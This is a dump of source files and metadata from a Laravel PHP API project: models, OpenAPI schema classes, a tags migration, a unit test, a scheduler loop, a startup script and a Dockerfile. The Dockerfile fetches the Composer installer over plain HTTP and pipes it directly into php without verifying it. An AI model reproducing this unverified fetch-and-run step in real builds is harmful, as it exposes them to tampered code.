"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Contracts\\Support\\Responsable;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Storage;\n\nclass File extends Model implements Responsable\n{\n use Mutators\\FileMutators;\n use Relationships\\FileRelationships;\n use Scopes\\FileScopes;\n\n const MIME_TYPE_PNG = 'image/png';\n const MIME_TYPE_JPEG = 'image/jpeg';\n const MIME_TYPE_TXT = 'text/plain';\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'is_private' => 'boolean',\n 'created_at' => 'datetime',\n 'updated_at' => 'datetime',\n 'deleted_at' => 'datetime',\n ];\n\n /**\n * Create an HTTP response that represents the object.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Response\n */\n public function toResponse($request): Response\n {\n return response()->make($this->getContent(), Response::HTTP_OK, [\n 'Content-Type' => $this->mime_type,\n 'Content-Disposition' => sprintf('inline; filename=\"%s\"', $this->filename),\n ]);\n }\n\n /**\n * @return string\n */\n public function getContent(): string\n {\n return Storage::cloud()->get($this->path());\n }\n\n /**\n * @return string\n */\n public function path(): string\n {\n $directory = $this->is_private ? 'files/private' : 'files/public';\n\n return \"/{$directory}/{$this->id}.dat\";\n }\n\n /**\n * @return string\n */\n protected function visibility(): string\n {\n return $this->is_private ? 'private' : 'public';\n }\n\n /**\n * @return string\n */\n public function url(): string\n {\n return Storage::cloud()->url($this->path());\n }\n\n /**\n * @param string $content\n * @return \\App\\Models\\File\n */\n public function upload(string $content): self\n {\n Storage::cloud()->put($this->path(), $content, $this->visibility());\n\n return $this;\n }\n\n /**\n * @param string $content\n * @return \\App\\Models\\File\n */\n public function uploadBase64EncodedFile(string $content): self\n {\n $data = explode(',', $content);\n $data = base64_decode(end($data));\n\n return $this->upload($data);\n }\n\n /**\n * Deletes the file from disk.\n */\n public function deleteFromDisk(): void\n {\n Storage::cloud()->delete($this->path());\n }\n\n /**\n * @return bool\n */\n public function isPrivate(): bool\n {\n return $this->is_private;\n }\n\n /**\n * @return bool\n */\n public function isPublic(): bool\n {\n return !$this->isPrivate();\n }\n}\n"
},
{
"alpha_fraction": 0.6918032765388489,
"alphanum_fraction": 0.6918032765388489,
"avg_line_length": 22.461538314819336,
"blob_id": "b8fecad97d7bdb21e253d5f5a0a2b6df93508b8c",
"content_id": "a3cb8f43fc1f5f422c6d3721244aca6d75ba8f0f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 305,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 13,
"path": "/docker/app/usr/local/bin/start-container",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Run migrations.\nphp /var/www/html/artisan migrate --force\n\n# Cache config and routes, if not in dev environment.\nif [[ \"${APP_ENV}\" != \"local\" ]]; then\n php /var/www/html/artisan config:cache\n php /var/www/html/artisan route:cache\nfi\n\n# Start supervisor.\n/usr/bin/supervisord\n"
},
{
"alpha_fraction": 0.5391134023666382,
"alphanum_fraction": 0.5397652983665466,
"avg_line_length": 33.088890075683594,
"blob_id": "0cd2d316157aade7d2fc71608fd9ff07ece439ab",
"content_id": "38ba68d1fd8cb0e9f12f31c8315964ca9fab58be",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1534,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 45,
"path": "/app/Docs/Schemas/Notification/NotificationSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Notification;\n\nuse App\\Models\\Notification;\nuse App\\Support\\Enum;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass NotificationSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('id')\n ->format(static::FORMAT_UUID),\n Schema::string('admin_id')\n ->format(static::FORMAT_UUID)\n ->nullable(),\n Schema::string('end_user_id')\n ->format(static::FORMAT_UUID)\n ->nullable(),\n Schema::string('channel')\n ->enum(...(new Enum(Notification::class))->getValues('CHANNEL')),\n Schema::string('recipient'),\n Schema::string('content'),\n Schema::string('sent_at')\n ->format(static::FORMAT_DATE_TIME)\n ->nullable(),\n Schema::string('created_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('updated_at')\n ->format(static::FORMAT_DATE_TIME)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6615259647369385,
"alphanum_fraction": 0.6623376607894897,
"avg_line_length": 33.22222137451172,
"blob_id": "4fd75648bc4f15ad08262d62b446d33aafa52e9b",
"content_id": "ee0e0fbb568f8a0b980c728cfa8f901be6816198",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1232,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 36,
"path": "/app/Docs/Paths/Contributions/ContributionsApprovePath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Contributions;\n\nuse App\\Docs\\Operations\\Contributions\\ApproveContributionOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass ContributionsApprovePath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/contributions/{contribution}/approve')\n ->parameters(\n Parameter::path()\n ->name('contribution')\n ->description('The ID of the contribution')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n ->required()\n )\n ->operations(\n ApproveContributionOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5996472835540771,
"alphanum_fraction": 0.6005290746688843,
"avg_line_length": 20.39622688293457,
"blob_id": "7ed5237a6705da1c56b6d00c567c0c85c99486d0",
"content_id": "42d2a02726bfeb46a2a55d28d740895ef10a47cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1134,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 53,
"path": "/app/Models/FileToken.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\n\nclass FileToken extends Model\n{\n use Mutators\\FileTokenMutators;\n use Relationships\\FileTokenRelationships;\n use Scopes\\FileTokenScopes;\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n\n /**\n * @return bool\n */\n public function hasExpired(): bool\n {\n return Date::now()->greaterThan(\n $this->created_at->addSeconds(\n Config::get('connecting_voices.file_tokens.expiry_time')\n )\n );\n }\n\n /**\n * @param \\App\\Models\\Admin $admin\n * @return bool\n */\n public function isForAdmin(Admin $admin): bool\n {\n return $this->user_id === $admin->user_id;\n }\n\n /**\n * @param \\App\\Models\\Admin $admin\n * @return bool\n */\n public function isValid(Admin $admin): bool\n {\n return !$this->hasExpired() && $this->isForAdmin($admin);\n }\n}\n"
},
{
"alpha_fraction": 0.6760082244873047,
"alphanum_fraction": 0.6766917109489441,
"avg_line_length": 35.57500076293945,
"blob_id": "aa5b483e74fe66fe045d56020f08fb66e9b23451",
"content_id": "3e6d77e1006d54ea452181991a621cde228d754c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1463,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 40,
"path": "/app/Docs/Paths/Contributions/ContributionsNestedPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Contributions;\n\nuse App\\Docs\\Operations\\Contributions\\DestroyContributionOperation;\nuse App\\Docs\\Operations\\Contributions\\ShowContributionOperation;\nuse App\\Docs\\Operations\\Contributions\\UpdateContributionOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass ContributionsNestedPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/contributions/{contribution}')\n ->parameters(\n Parameter::path()\n ->name('contribution')\n ->description('The ID of the contribution')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n ->required()\n )\n ->operations(\n ShowContributionOperation::create(),\n UpdateContributionOperation::create(),\n DestroyContributionOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.537484884262085,
"alphanum_fraction": 0.5380894541740417,
"avg_line_length": 17.584270477294922,
"blob_id": "2ae36b78aeb008fac3f7c5526555c9b74940094a",
"content_id": "f0eb1fb6058a57ea37a35abcd82d5b4d4f3ecbfa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1654,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 89,
"path": "/app/Mail/GenericMail.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Mail;\n\nuse Illuminate\\Bus\\Queueable;\nuse Illuminate\\Contracts\\Mail\\Mailer;\nuse Illuminate\\Contracts\\Queue\\ShouldQueue;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Mail\\Message;\nuse Illuminate\\Queue\\InteractsWithQueue;\n\nclass GenericMail implements ShouldQueue\n{\n use Dispatchable;\n use InteractsWithQueue;\n use Queueable;\n\n /**\n * @var string\n */\n protected $to;\n\n /**\n * @var string\n */\n protected $subject;\n\n /**\n * @var string\n */\n protected $body;\n\n /**\n * Dispatcher constructor.\n *\n * @param string $to\n * @param string $subject\n * @param string $body\n */\n public function __construct(string $to, string $subject, string $body)\n {\n $this->to = $to;\n $this->subject = $subject;\n $this->body = $body;\n }\n\n /**\n * Dispatch the email as a job to the queue.\n *\n * @param \\Illuminate\\Contracts\\Mail\\Mailer $mailer\n */\n public function handle(Mailer $mailer): void\n {\n $mailer->raw(\n $this->body,\n function (Message $message): void {\n $message\n ->to($this->to)\n ->subject($this->subject);\n }\n );\n }\n\n /**\n * @return string\n */\n public function getTo(): string\n {\n return $this->to;\n }\n\n /**\n * @return string\n */\n public function getSubject(): string\n {\n return $this->subject;\n }\n\n /**\n * @return string\n */\n public function getBody(): string\n {\n return $this->body;\n }\n}\n"
},
{
"alpha_fraction": 0.5139057040214539,
"alphanum_fraction": 0.514308750629425,
"avg_line_length": 28.188236236572266,
"blob_id": "aca2dad7e362444a29d91134472bdc7709fc75c5",
"content_id": "28e7def808aba1e3685f11c0ab0f1d70c78ffbb9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2481,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 85,
"path": "/database/migrations/2019_05_28_172828_create_tags_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Schema;\nuse Illuminate\\Support\\Str;\n\nclass CreateTagsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('tags', function (Blueprint $table): void {\n $table->uuid('id')->primary();\n $table->uuid('parent_tag_id')->nullable();\n $table->string('name');\n $table->timestamp('created_at')->useCurrent();\n $table->timestamp('updated_at')->useCurrent();\n $table->softDeletes();\n });\n\n Schema::table('tags', function (Blueprint $table): void {\n $table->foreign('parent_tag_id')->references('id')->on('tags');\n });\n\n DB::table('tags')->insert($this->getTags());\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('tags');\n }\n\n /**\n * @return array\n */\n protected function getTags(): array\n {\n // Get the path of the tags JSON file.\n $tagsPath = realpath(dirname(__DIR__)) . '/storage/tags.json';\n\n // Decode the JSON file into an associative array.\n $tags = json_decode(file_get_contents($tagsPath), true);\n\n /*\n * Prepare the empty parsed tags array, as the JSON object is not in the format matching\n * the database.\n */\n $parsedTags = [];\n\n // Loop through each parent tag.\n foreach ($tags as $parent => $children) {\n // Parse the tag into a format that can be inserted into the database.\n $parentTag = [\n 'id' => Str::uuid()->toString(),\n 'parent_tag_id' => null,\n 'name' => $parent,\n ];\n $parsedTags[] = $parentTag;\n\n // Loop through each child tag of the current parent.\n foreach ($children as $child) {\n /*\n * Parse the tag into a format that can be inserted into the database, and link to\n * the parent.\n */\n $parsedTags[] = [\n 'id' => Str::uuid()->toString(),\n 'parent_tag_id' => $parentTag['id'],\n 'name' => $child,\n ];\n }\n }\n\n return $parsedTags;\n }\n}\n"
},
{
"alpha_fraction": 0.5795228481292725,
"alphanum_fraction": 0.5805168747901917,
"avg_line_length": 21.863636016845703,
"blob_id": "38411cf05cccf80ee636b977202ee06781deae83",
"content_id": "e58b12c24a7a575c88f291543552292d86a64f4b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1006,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 44,
"path": "/tests/Unit/Rules/ParentTagIsTopLevelTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Rules;\n\nuse App\\Models\\Tag;\nuse App\\Rules\\ParentTagIsTopLevel;\nuse Tests\\TestCase;\n\nclass ParentTagIsTopLevelTest extends TestCase\n{\n /** @test */\n public function it_passes_for_top_level_tag(): void\n {\n $tag = factory(Tag::class)->create();\n $rule = new ParentTagIsTopLevel();\n\n $result = $rule->passes('test', $tag->id);\n\n $this->assertTrue($result);\n }\n\n /** @test */\n public function it_fails_for_child_level_tag(): void\n {\n $tag = factory(Tag::class)->create([\n 'parent_tag_id' => factory(Tag::class)->create()->id,\n ]);\n $rule = new ParentTagIsTopLevel();\n\n $result = $rule->passes('test', $tag->id);\n\n $this->assertFalse($result);\n }\n\n /** @test */\n public function message_is_correct(): void\n {\n $rule = new ParentTagIsTopLevel();\n\n $this->assertEquals('The parent tag must be a top level tag.', $rule->message());\n }\n}\n"
},
{
"alpha_fraction": 0.7002288103103638,
"alphanum_fraction": 0.7199084758758545,
"avg_line_length": 34.819671630859375,
"blob_id": "a57775dd40d1c04ac9c22e0eebe4ae9eeb6fb14f",
"content_id": "2718b231c9dbf2235a5ef72acbf5452170c9e5f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 2185,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 61,
"path": "/docker/app/Dockerfile",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# Set base image.\nFROM ubuntu:18.04\n\n# Set maintainer to Ayup Digital.\nLABEL maintainer=\"Ayup Digital\"\n\n# Install generic software.\nRUN apt-get update \\\n && apt-get install -y locales nginx curl zip unzip git software-properties-common supervisor \\\n && locale-gen en_GB.UTF-8\n\n# Set needed environment variables before installing PHP.\nENV DEBIAN_FRONTEND noninteractive\nENV LANG en_GB.UTF-8\nENV LANGUAGE en_GB:en\nENV LC_ALL en_GB.UTF-8\n\n# Install PHP.\nRUN apt-add-repository -y ppa:ondrej/php \\\n && apt-get update \\\n && apt-get install -y php7.3-fpm php7.3-cli php7.3-gd php7.3-mysql php7.3-redis \\\n php7.3-imap php7.3-mbstring php7.3-xml php7.3-curl php7.3-zip php-xdebug \\\n && php -r \"readfile('http://getcomposer.org/installer');\" | php -- --install-dir=/usr/bin/ --filename=composer \\\n && mkdir /run/php \\\n && apt-get remove -y --purge software-properties-common \\\n && apt-get -y autoremove \\\n && apt-get clean \\\n && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*\n\n# Set system timezone to Europe/London.\nRUN unlink /etc/localtime \\\n && ln -s /usr/share/zoneinfo/Europe/London /etc/localtime\n\n# Redirect NGINX output to stdout and stderr.\nRUN ln -sf /dev/stdout /var/log/nginx/access.log \\\n && ln -sf /dev/stderr /var/log/nginx/error.log\n\n# Copy configuration files over for installed software.\nCOPY etc/nginx/nginx.conf /etc/nginx/nginx.conf\nCOPY etc/nginx/sites-available/default /etc/nginx/sites-available/default\nCOPY etc/php/7.3/fpm/php-fpm.conf /etc/php/7.3/fpm/php-fpm.conf\nCOPY etc/php/7.3/fpm/php.ini /etc/php/7.3/fpm/php.ini\nCOPY etc/php/7.3/cli/php.ini /etc/php/7.3/cli/php.ini\nCOPY etc/supervisor/conf.d/supervisord.conf /etc/supervisor/conf.d/supervisord.conf\n\n# Copy the bootstrap script over and make executable.\nCOPY /usr/local/bin/start-container /usr/local/bin/start-container\nRUN chmod +x /usr/local/bin/start-container\n\n# Copy the packaged app (only used when deploying).\nCOPY packaged /var/www/html\nRUN chown -R www-data: /var/www/html\n\n# Expose port 80 for HTTP access.\nEXPOSE 80\n\n# Set the working directory to the project root.\nWORKDIR /var/www/html\n\n# Set default command to the bootstrap script.\nCMD [\"start-container\"]\n"
},
{
"alpha_fraction": 0.5508274435997009,
"alphanum_fraction": 0.5543735027313232,
"avg_line_length": 18.674419403076172,
"blob_id": "bf39f0cda0c097ffbe5e1c4802b93acc2b10ab3c",
"content_id": "023775006e53b601282b18a6e2a7568f9743db29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 846,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 43,
"path": "/app/Console/Commands/Cv/Schedule/LoopCommand.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Console\\Commands\\Cv\\Schedule;\n\nuse Illuminate\\Console\\Command;\n\nclass LoopCommand extends Command\n{\n const ONE_MINUTE = 60;\n\n /**\n * The name and signature of the console command.\n *\n * @var string\n */\n protected $signature = 'cv:schedule:loop';\n\n /**\n * The console command description.\n *\n * @var string\n */\n protected $description = 'Runs the scheduler every minute';\n\n /**\n * Execute the console command.\n */\n public function handle(): void\n {\n while (true) {\n $start = time();\n $this->call('schedule:run');\n $end = time();\n\n $timeTaken = $end - $start;\n $timeUntilOneMinute = static::ONE_MINUTE - $timeTaken;\n\n sleep($timeUntilOneMinute);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.6430529952049255,
"alphanum_fraction": 0.6439670920372009,
"avg_line_length": 28.97260284423828,
"blob_id": "a24e0428a091ab23a64bd1f8552f406a74989f80",
"content_id": "16f98af5693e30f245ef88a881daa3c4f223f37b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2188,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 73,
"path": "/app/Http/Controllers/V1/AuditController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Filters\\Audit\\AdminIdFilter;\nuse App\\Http\\Filters\\Audit\\EndUserIdFilter;\nuse App\\Http\\Resources\\AuditResource;\nuse App\\Models\\Audit;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Spatie\\QueryBuilder\\Filter;\nuse Spatie\\QueryBuilder\\QueryBuilder;\n\nclass AuditController extends ApiController\n{\n /**\n * AuditController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n $this->authorizeResource(Audit::class);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(Request $request): ResourceCollection\n {\n $baseQuery = Audit::query()\n ->with('user.admin', 'user.endUser', 'client');\n\n $audits = QueryBuilder::for($baseQuery)\n ->allowedFilters([\n Filter::exact('id'),\n Filter::custom('admin_id', AdminIdFilter::class),\n Filter::custom('end_user_id', EndUserIdFilter::class),\n ])\n ->allowedSorts([\n 'created_at',\n ])\n ->defaultSort('-created_at')\n ->paginate($this->perPage);\n\n event(EndpointInvoked::onRead($request, 'Viewed all audits.'));\n\n return AuditResource::collection($audits);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Audit $audit\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, Audit $audit): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed audit [{$audit->id}].\"));\n\n return new AuditResource($audit);\n }\n}\n"
},
{
"alpha_fraction": 0.6286666393280029,
"alphanum_fraction": 0.6293333172798157,
"avg_line_length": 31.60869598388672,
"blob_id": "3fa31cd21339ae9b3c586bc5abadb2fc78aa12b1",
"content_id": "71bb7a9689d26160f89be3d518e2dd0bfd8c038b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1500,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 46,
"path": "/app/Docs/Operations/Settings/IndexSettingsOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Settings;\n\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Schemas\\Setting\\SettingsSchema;\nuse App\\Docs\\Tags\\SettingsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass IndexSettingsOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('List all settings')\n ->description(\n Utils::operationDescription(\n ['Public', Admin::class, EndUser::class],\n 'Private settings will only be return for admins.'\n )\n )\n ->tags(SettingsTag::create())\n ->noSecurity()\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, SettingsSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.643966555595398,
"alphanum_fraction": 0.6451612710952759,
"avg_line_length": 27.86206817626953,
"blob_id": "6a5d676025fea4fc13e6700feeef6da749b9e7df",
"content_id": "ee01fe8be37d9e54068a53c2f256964b3c22b9fa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 837,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 29,
"path": "/app/Http/Filters/Contribution/TagIdsFilter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Filters\\Contribution;\n\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Spatie\\QueryBuilder\\Filters\\Filter;\n\nclass TagIdsFilter implements Filter\n{\n /**\n * @param \\Illuminate\\Database\\Eloquent\\Builder $query\n * @param array|string $tagIds\n * @param string $property\n * @return \\Illuminate\\Database\\Eloquent\\Builder\n */\n public function __invoke(Builder $query, $tagIds, string $property): Builder\n {\n // If untagged then only get contributions with no tag (excluding soft deleted tags).\n if ($tagIds === 'untagged') {\n return $query->whereDoesntHave('tags');\n }\n\n return $query->whereHas('tags', function (Builder $query) use ($tagIds): void {\n $query->whereIn('tags.id', (array)$tagIds);\n });\n }\n}\n"
},
{
"alpha_fraction": 0.5658106207847595,
"alphanum_fraction": 0.5666131377220154,
"avg_line_length": 28.66666603088379,
"blob_id": "627b632ec1f75296f57aaebc351d7b56618e28fb",
"content_id": "e7c32312ee5335f29656d52d5044550b119853ea",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1246,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 42,
"path": "/app/Docs/Parameters/SortParameter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Parameters;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass SortParameter extends Parameter\n{\n /**\n * @param string|null $objectId\n * @param string[] $fields\n * @param null $default\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter\n */\n public static function create(\n string $objectId = null,\n array $fields = [],\n $default = null\n ): BaseObject {\n $fields = empty($fields) ? '`n/a`' : '`' . implode($fields, '`,`') . '`';\n\n return parent::create($objectId)\n ->in(static::IN_QUERY)\n ->name('sort')\n ->description(\n <<<EOT\n Comma separated list of fields to sort by.\n The results are sorted in the order of which the fields have been provided.\n Prefix a field with `-` to indicate a descending sort.\n \n Supported fields: [{$fields}]\n EOT\n )\n ->schema(\n Schema::string()->default($default)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5795645117759705,
"alphanum_fraction": 0.5812395215034485,
"avg_line_length": 14.710526466369629,
"blob_id": "69346e1621f769d80935cabc58715905001da569",
"content_id": "3cc3366697530bbf504fb509124efea9db93ee17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 597,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 38,
"path": "/app/Events/Tag/TagSoftDeleted.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Tag;\n\nuse App\\Models\\Tag;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass TagSoftDeleted\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\Tag\n */\n protected $tag;\n\n /**\n * TagCreated constructor.\n *\n * @param \\App\\Models\\Tag $tag\n */\n public function __construct(Tag $tag)\n {\n $this->tag = $tag;\n }\n\n /**\n * @return \\App\\Models\\Tag\n */\n public function getTag(): Tag\n {\n return $this->tag;\n }\n}\n"
},
{
"alpha_fraction": 0.5290006995201111,
"alphanum_fraction": 0.5296995043754578,
"avg_line_length": 31.522727966308594,
"blob_id": "555aaf876306e8777a669963829725197552c28c",
"content_id": "d88bb96210e80fda3500580d08218df7424abe3c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1431,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 44,
"path": "/app/Docs/Schemas/Audit/AuditSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
